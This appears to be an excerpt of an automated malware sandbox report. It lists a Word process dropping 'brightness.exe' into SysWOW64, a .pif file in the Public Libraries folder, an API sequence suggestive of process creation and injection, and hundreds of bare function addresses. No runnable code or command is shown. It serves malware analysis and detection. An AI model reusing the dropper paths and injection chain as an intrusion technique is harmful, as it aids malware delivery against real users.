Code function: 8_2_0284F0A8 InetIsOffline,CoInitialize,CoUninitialize,Sleep,MoveFileA,MoveFileA,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess,

8_2_0284F0A8

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File created: C:\Windows\SysWOW64\brightness.exe

Jump to behavior

Source: C:\Windows\SysWOW64\brightness.exe	Code function: 8_2_0285D367	8_2_0285D367
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 8_2_028320C4	8_2_028320C4
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 8_2_0285E59A	8_2_0285E59A
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_00408C60	12_2_00408C60
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_0040DC11	12_2_0040DC11
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_00407C3F	12_2_00407C3F
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_00418CCC	12_2_00418CCC
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_00406CA0	12_2_00406CA0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_004028B0	12_2_004028B0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_0041A4BE	12_2_0041A4BE
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_00418244	12_2_00418244
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_00401650	12_2_00401650
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_00402F20	12_2_00402F20
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_004193C4	12_2_004193C4
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_00418788	12_2_00418788
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_00402F89	12_2_00402F89
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_00402B90	12_2_00402B90
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_004073A0	12_2_004073A0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_260012B0	12_2_260012B0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_260012C0	12_2_260012C0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_26001551	12_2_26001551
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_26001560	12_2_26001560
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_29115822	12_2_29115822
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2911AA58	12_2_2911AA58
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2911BA7F	12_2_2911BA7F
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2911BD60	12_2_2911BD60
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_29118F18	12_2_29118F18
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2911AF00	12_2_2911AF00
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_29115FA8	12_2_29115FA8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2911B1DF	12_2_2911B1DF
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_291141E0	12_2_291141E0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2911F0C8	12_2_2911F0C8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2911D490	12_2_2911D490
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2911B4C0	12_2_2911B4C0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2911B7A0	12_2_2911B7A0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2911AC20	12_2_2911AC20
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_29113068	12_2_29113068
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2911E5D9	12_2_2911E5D9
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2911E5E8	12_2_2911E5E8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2911D480	12_2_2911D480
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1D0E38	12_2_2A1D0E38
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1D7A28	12_2_2A1D7A28
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1D0738	12_2_2A1D0738
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1D0040	12_2_2A1D0040
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1D3508	12_2_2A1D3508
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1D8550	12_2_2A1D8550
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1DB580	12_2_2A1DB580
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1DBE30	12_2_2A1DBE30
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1D0E29	12_2_2A1D0E29
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1DBE22	12_2_2A1DBE22
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1DF250	12_2_2A1DF250
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1DF242	12_2_2A1DF242
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1DC27A	12_2_2A1DC27A
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1DF69A	12_2_2A1DF69A
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1DC288	12_2_2A1DC288
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1DF6A8	12_2_2A1DF6A8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1DC6D0	12_2_2A1DC6D0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1DFAF1	12_2_2A1DFAF1
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1DC6E0	12_2_2A1DC6E0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1DFB00	12_2_2A1DFB00
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1DCB38	12_2_2A1DCB38
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1DCB28	12_2_2A1DCB28
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1D072A	12_2_2A1D072A
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1DCF90	12_2_2A1DCF90
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1DCF82	12_2_2A1DCF82
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1DD3D8	12_2_2A1DD3D8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1DD3E8	12_2_2A1DD3E8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1D0006	12_2_2A1D0006
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1DD832	12_2_2A1DD832
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1DD840	12_2_2A1DD840
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1D7070	12_2_2A1D7070
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1DDC98	12_2_2A1DDC98
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1DDC88	12_2_2A1DDC88
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1D7080	12_2_2A1D7080
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1D34F8	12_2_2A1D34F8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1DE0F0	12_2_2A1DE0F0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1DE0E0	12_2_2A1DE0E0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1DE538	12_2_2A1DE538
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1DE548	12_2_2A1DE548
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1D8540	12_2_2A1D8540
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1DB570	12_2_2A1DB570
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1DE990	12_2_2A1DE990
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1DE9A0	12_2_2A1DE9A0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1DB9D8	12_2_2A1DB9D8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1DB9C8	12_2_2A1DB9C8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1DEDF8	12_2_2A1DEDF8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1DEDE9	12_2_2A1DEDE9
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1E6C18	12_2_2A1E6C18
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1EBA10	12_2_2A1EBA10
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1E7AF0	12_2_2A1E7AF0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1EA340	12_2_2A1EA340
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1E11A0	12_2_2A1E11A0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1E65C0	12_2_2A1E65C0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1E4610	12_2_2A1E4610
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1E0006	12_2_2A1E0006
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1EDA00	12_2_2A1EDA00
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1EBA01	12_2_2A1EBA01
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1EEC2F	12_2_2A1EEC2F
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1E4620	12_2_2A1E4620
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1E8020	12_2_2A1E8020
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1E3058	12_2_2A1E3058
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1E1A50	12_2_2A1E1A50
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1ECC50	12_2_2A1ECC50
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1E5450	12_2_2A1E5450
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1EAC50	12_2_2A1EAC50
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1E1A40	12_2_2A1E1A40
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1EEC40	12_2_2A1EEC40
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1E0040	12_2_2A1E0040
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1ECC40	12_2_2A1ECC40
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1EDE7F	12_2_2A1EDE7F
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1E4A78	12_2_2A1E4A78
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1E4A6A	12_2_2A1E4A6A
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1E3068	12_2_2A1E3068
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1EAC60	12_2_2A1EAC60
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1E5460	12_2_2A1E5460
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1E0498	12_2_2A1E0498
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1E1E98	12_2_2A1E1E98
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1EDE90	12_2_2A1EDE90
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1EBE8F	12_2_2A1EBE8F
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1E9288	12_2_2A1E9288
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1E0489	12_2_2A1E0489
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1EF0BF	12_2_2A1EF0BF
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1E58B8	12_2_2A1E58B8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1E34B2	12_2_2A1E34B2
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1E9EB0	12_2_2A1E9EB0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1E58AF	12_2_2A1E58AF
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1E58A8	12_2_2A1E58A8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1E1EA8	12_2_2A1E1EA8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1E9EA2	12_2_2A1E9EA2
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1EBEA0	12_2_2A1EBEA0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1EB0DF	12_2_2A1EB0DF
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1E4ED0	12_2_2A1E4ED0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1EF0D0	12_2_2A1EF0D0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1ED0CF	12_2_2A1ED0CF
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1E34C0	12_2_2A1E34C0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1E4EC0	12_2_2A1E4EC0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1EB0F0	12_2_2A1EB0F0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1E08F0	12_2_2A1E08F0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1ED0E0	12_2_2A1ED0E0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1E08E0	12_2_2A1E08E0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1E7AE0	12_2_2A1E7AE0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1E3918	12_2_2A1E3918
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1E5D10	12_2_2A1E5D10
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1E6B10	12_2_2A1E6B10
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1EE310	12_2_2A1EE310
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1E3909	12_2_2A1E3909
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1E2300	12_2_2A1E2300
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1E5D00	12_2_2A1E5D00
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1E0D38	12_2_2A1E0D38
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1EC330	12_2_2A1EC330
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1EA330	12_2_2A1EA330
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1EE320	12_2_2A1EE320
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1EC320	12_2_2A1EC320
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1E6158	12_2_2A1E6158
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1EF553	12_2_2A1EF553
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1E0D48	12_2_2A1E0D48
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1E3D70	12_2_2A1E3D70
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1ED570	12_2_2A1ED570
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1EB570	12_2_2A1EB570
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1E6168	12_2_2A1E6168
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1E3D62	12_2_2A1E3D62
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1EF560	12_2_2A1EF560
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1ED560	12_2_2A1ED560
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1E1190	12_2_2A1E1190
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1EB580	12_2_2A1EB580
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1EA7BF	12_2_2A1EA7BF
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1E41B8	12_2_2A1E41B8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1EC7B2	12_2_2A1EC7B2
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1EE7B0	12_2_2A1EE7B0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1E65B0	12_2_2A1E65B0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1EE7A0	12_2_2A1EE7A0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1EA7D0	12_2_2A1EA7D0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1E41C8	12_2_2A1E41C8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1EC7C0	12_2_2A1EC7C0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1E15F8	12_2_2A1E15F8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1EF9F0	12_2_2A1EF9F0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1ED9F1	12_2_2A1ED9F1
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1E15E8	12_2_2A1E15E8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A1EF9E2	12_2_2A1EF9E2
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A254908	12_2_2A254908
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A25DF18	12_2_2A25DF18
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A254FA8	12_2_2A254FA8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A253227	12_2_2A253227
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A257120	12_2_2A257120
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A25C720	12_2_2A25C720
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A250922	12_2_2A250922
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A250928	12_2_2A250928
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A259C28	12_2_2A259C28
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A255928	12_2_2A255928
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A251237	12_2_2A251237
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A25C730	12_2_2A25C730
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A258432	12_2_2A258432
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A253238	12_2_2A253238
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A255938	12_2_2A255938
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A25F238	12_2_2A25F238
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A25AF38	12_2_2A25AF38
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A250006	12_2_2A250006
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A255E00	12_2_2A255E00
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A25F700	12_2_2A25F700
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A25B400	12_2_2A25B400
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A25710F	12_2_2A25710F
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A25DF09	12_2_2A25DF09
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A258908	12_2_2A258908
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A252908	12_2_2A252908
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A25B410	12_2_2A25B410
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A252918	12_2_2A252918
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A259C18	12_2_2A259C18
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A254467	12_2_2A254467
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A259760	12_2_2A259760
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A255460	12_2_2A255460
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A25AA6F	12_2_2A25AA6F
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A251B68	12_2_2A251B68
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A25C268	12_2_2A25C268
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A252477	12_2_2A252477
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A255470	12_2_2A255470
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A25ED70	12_2_2A25ED70
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A254478	12_2_2A254478
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A257F78	12_2_2A257F78
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A25D57A	12_2_2A25D57A
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A25DA41	12_2_2A25DA41
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A250040	12_2_2A250040
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A258440	12_2_2A258440
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A251248	12_2_2A251248
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A25AF48	12_2_2A25AF48
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A253B48	12_2_2A253B48
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A256C48	12_2_2A256C48
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A25C257	12_2_2A25C257
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A259751	12_2_2A259751
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A25DA50	12_2_2A25DA50
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A253B58	12_2_2A253B58
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A256C58	12_2_2A256C58
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A251B58	12_2_2A251B58
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A25BDA0	12_2_2A25BDA0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A252DA2	12_2_2A252DA2
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A25A5A9	12_2_2A25A5A9
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A252DA8	12_2_2A252DA8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A25E8A8	12_2_2A25E8A8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A250DA8	12_2_2A250DA8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A25D0B1	12_2_2A25D0B1
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A257AB0	12_2_2A257AB0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A2504BF	12_2_2A2504BF
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A2562BE	12_2_2A2562BE
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A250DB8	12_2_2A250DB8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A25A5B8	12_2_2A25A5B8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A2536B8	12_2_2A2536B8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A25FBB8	12_2_2A25FBB8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A256787	12_2_2A256787
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A25AA80	12_2_2A25AA80
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A252488	12_2_2A252488
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A25D588	12_2_2A25D588
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A259288	12_2_2A259288
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A25BD91	12_2_2A25BD91
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A256790	12_2_2A256790
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A259298	12_2_2A259298
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A254E98	12_2_2A254E98
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A25E898	12_2_2A25E898
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A25CBE7	12_2_2A25CBE7
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A25A0E1	12_2_2A25A0E1
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A25E3E0	12_2_2A25E3E0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A253FE8	12_2_2A253FE8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A2575E8	12_2_2A2575E8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A251FE8	12_2_2A251FE8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A2588F7	12_2_2A2588F7
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A255DF1	12_2_2A255DF1
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A25A0F0	12_2_2A25A0F0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A25F6F0	12_2_2A25F6F0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A251FF8	12_2_2A251FF8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A25CBF8	12_2_2A25CBF8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 12_2_2A2548FA	12_2_2A2548FA
